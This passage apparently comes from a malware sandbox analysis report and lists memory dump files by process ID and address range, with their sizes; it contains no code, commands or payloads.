                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        128KB

                                                                                                                                                                                                                                                                      • memory/984-1727-0x000001C6583C0000-0x000001C6583E0000-memory.dmp

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        128KB

                                                                                                                                                                                                                                                                      • memory/984-1738-0x000001C6589D0000-0x000001C6589F0000-memory.dmp

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        128KB

                                                                                                                                                                                                                                                                      • memory/1088-183-0x000002882A050000-0x000002882A066000-memory.dmp

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        88KB

                                                                                                                                                                                                                                                                      • memory/1088-185-0x000002882A0E0000-0x000002882A106000-memory.dmp

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        152KB

                                                                                                                                                                                                                                                                      • memory/1088-184-0x000002882A040000-0x000002882A04A000-memory.dmp

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        40KB

                                                                                                                                                                                                                                                                      • memory/1464-398-0x0000000004620000-0x0000000004621000-memory.dmp

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                      • memory/1604-1708-0x0000000004980000-0x0000000004981000-memory.dmp

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        4KB

• memory/1948-1310-0x00000230C4A80000-0x00000230C4AA0000-memory.dmp (Filesize: 128KB)
• memory/1948-1287-0x00000230C4460000-0x00000230C4480000-memory.dmp (Filesize: 128KB)
• memory/1948-1279-0x00000230C44A0000-0x00000230C44C0000-memory.dmp (Filesize: 128KB)
• memory/2468-725-0x0000021CD0F00000-0x0000021CD0F20000-memory.dmp (Filesize: 128KB)
• memory/2468-734-0x0000021CD1300000-0x0000021CD1320000-memory.dmp (Filesize: 128KB)
• memory/2468-718-0x0000021CD0F40000-0x0000021CD0F60000-memory.dmp (Filesize: 128KB)
• memory/2648-864-0x000001F891BC0000-0x000001F891BE0000-memory.dmp (Filesize: 128KB)
• memory/2648-850-0x000001F08FE00000-0x000001F08FF00000-memory.dmp (Filesize: 1024KB)
• memory/2648-883-0x000001F8922D0000-0x000001F8922F0000-memory.dmp (Filesize: 128KB)
• memory/2648-853-0x000001F891F00000-0x000001F891F20000-memory.dmp (Filesize: 128KB)
• memory/2772-711-0x00000000041B0000-0x00000000041B1000-memory.dmp (Filesize: 4KB)
• memory/2988-1839-0x0000000004C70000-0x0000000004C71000-memory.dmp (Filesize: 4KB)
• memory/3132-1598-0x000001FD13EA0000-0x000001FD13EC0000-memory.dmp (Filesize: 128KB)
• memory/3132-1567-0x000001FD13AD0000-0x000001FD13AF0000-memory.dmp (Filesize: 128KB)
• memory/3132-1583-0x000001FD13A90000-0x000001FD13AB0000-memory.dmp (Filesize: 128KB)
• memory/3360-3-0x00007FFC2C063000-0x00007FFC2C065000-memory.dmp (Filesize: 8KB)
• memory/3360-4-0x000002239D820000-0x000002239D842000-memory.dmp (Filesize: 136KB)
• memory/3360-14-0x00007FFC2C060000-0x00007FFC2CB21000-memory.dmp (Filesize: 10.8MB)
• memory/3360-15-0x00007FFC2C060000-0x00007FFC2CB21000-memory.dmp (Filesize: 10.8MB)
• memory/3360-16-0x000002239DF90000-0x000002239E152000-memory.dmp (Filesize: 1.8MB)
• memory/3360-23-0x00007FFC2C060000-0x00007FFC2CB21000-memory.dmp (Filesize: 10.8MB)
• memory/3608-1419-0x0000000002A70000-0x0000000002A71000-memory.dmp (Filesize: 4KB)
• memory/3700-1877-0x0000014B6CD60000-0x0000014B6CD80000-memory.dmp (Filesize: 128KB)
• memory/3700-1855-0x0000014B6C950000-0x0000014B6C970000-memory.dmp (Filesize: 128KB)
• memory/3700-1846-0x0000014B6C990000-0x0000014B6C9B0000-memory.dmp (Filesize: 128KB)
• memory/3792-1008-0x000001F7A1470000-0x000001F7A1490000-memory.dmp (Filesize: 128KB)
• memory/3792-997-0x000001F7A0550000-0x000001F7A0650000-memory.dmp (Filesize: 1024KB)
• memory/3792-1020-0x000001F7A1A80000-0x000001F7A1AA0000-memory.dmp (Filesize: 128KB)
• memory/3792-1000-0x000001F7A14B0000-0x000001F7A14D0000-memory.dmp (Filesize: 128KB)
• memory/3792-996-0x000001F7A0550000-0x000001F7A0650000-memory.dmp (Filesize: 1024KB)
• memory/3792-995-0x000001F7A0550000-0x000001F7A0650000-memory.dmp (Filesize: 1024KB)
• memory/4132-1131-0x00000000040B0000-0x00000000040B1000-memory.dmp (Filesize: 4KB)
• memory/4172-65-0x0000021735C50000-0x0000021735C68000-memory.dmp (Filesize: 96KB)
• memory/4172-60-0x00000217364F0000-0x0000021736A18000-memory.dmp (Filesize: 5.2MB)
• memory/4280-1959-0x0000000003FF0000-0x0000000003FF1000-memory.dmp (Filesize: 4KB)
• memory/4416-567-0x0000000004C90000-0x0000000004C91000-memory.dmp (Filesize: 4KB)
• memory/4436-846-0x0000000004220000-0x0000000004221000-memory.dmp (Filesize: 4KB)
• memory/4468-1997-0x0000023F9A0B0000-0x0000023F9A0D0000-memory.dmp (Filesize: 128KB)
• memory/4468-1983-0x0000023F999A0000-0x0000023F999C0000-memory.dmp (Filesize: 128KB)
• memory/4468-1966-0x0000023F999E0000-0x0000023F99A00000-memory.dmp (Filesize: 128KB)
• memory/4512-1272-0x00000000043E0000-0x00000000043E1000-memory.dmp (Filesize: 4KB)
• memory/4672-1134-0x000001287E800000-0x000001287E900000-memory.dmp

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        1024KB

                                                                                                                                                                                                                                                                      • memory/4672-1133-0x000001287E800000-0x000001287E900000-memory.dmp

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        1024KB

                                                                                                                                                                                                                                                                      • memory/4672-1148-0x00000130805B0000-0x00000130805D0000-memory.dmp

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        128KB

                                                                                                                                                                                                                                                                      • memory/4672-1138-0x0000013080900000-0x0000013080920000-memory.dmp

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        128KB

                                                                                                                                                                                                                                                                      • memory/4672-1169-0x0000013080CC0000-0x0000013080CE0000-memory.dmp

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        128KB

                                                                                                                                                                                                                                                                      • memory/4700-583-0x000002625FB90000-0x000002625FBB0000-memory.dmp

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        128KB

                                                                                                                                                                                                                                                                      • memory/4700-570-0x000002625EB00000-0x000002625EC00000-memory.dmp

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        1024KB

                                                                                                                                                                                                                                                                      • memory/4700-569-0x000002625EB00000-0x000002625EC00000-memory.dmp

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        1024KB

                                                                                                                                                                                                                                                                      • memory/4700-595-0x000002625FFA0000-0x000002625FFC0000-memory.dmp

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        128KB

                                                                                                                                                                                                                                                                      • memory/4700-574-0x000002625FBD0000-0x000002625FBF0000-memory.dmp

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        128KB

                                                                                                                                                                                                                                                                      • memory/4796-401-0x000001DDF15A0000-0x000001DDF16A0000-memory.dmp

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        1024KB

                                                                                                                                                                                                                                                                      • memory/4796-427-0x000001DDF2990000-0x000001DDF29B0000-memory.dmp

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        128KB

                                                                                                                                                                                                                                                                      • memory/4796-416-0x000001DDF2580000-0x000001DDF25A0000-memory.dmp

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        128KB

                                                                                                                                                                                                                                                                      • memory/4796-405-0x000001DDF25C0000-0x000001DDF25E0000-memory.dmp

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        128KB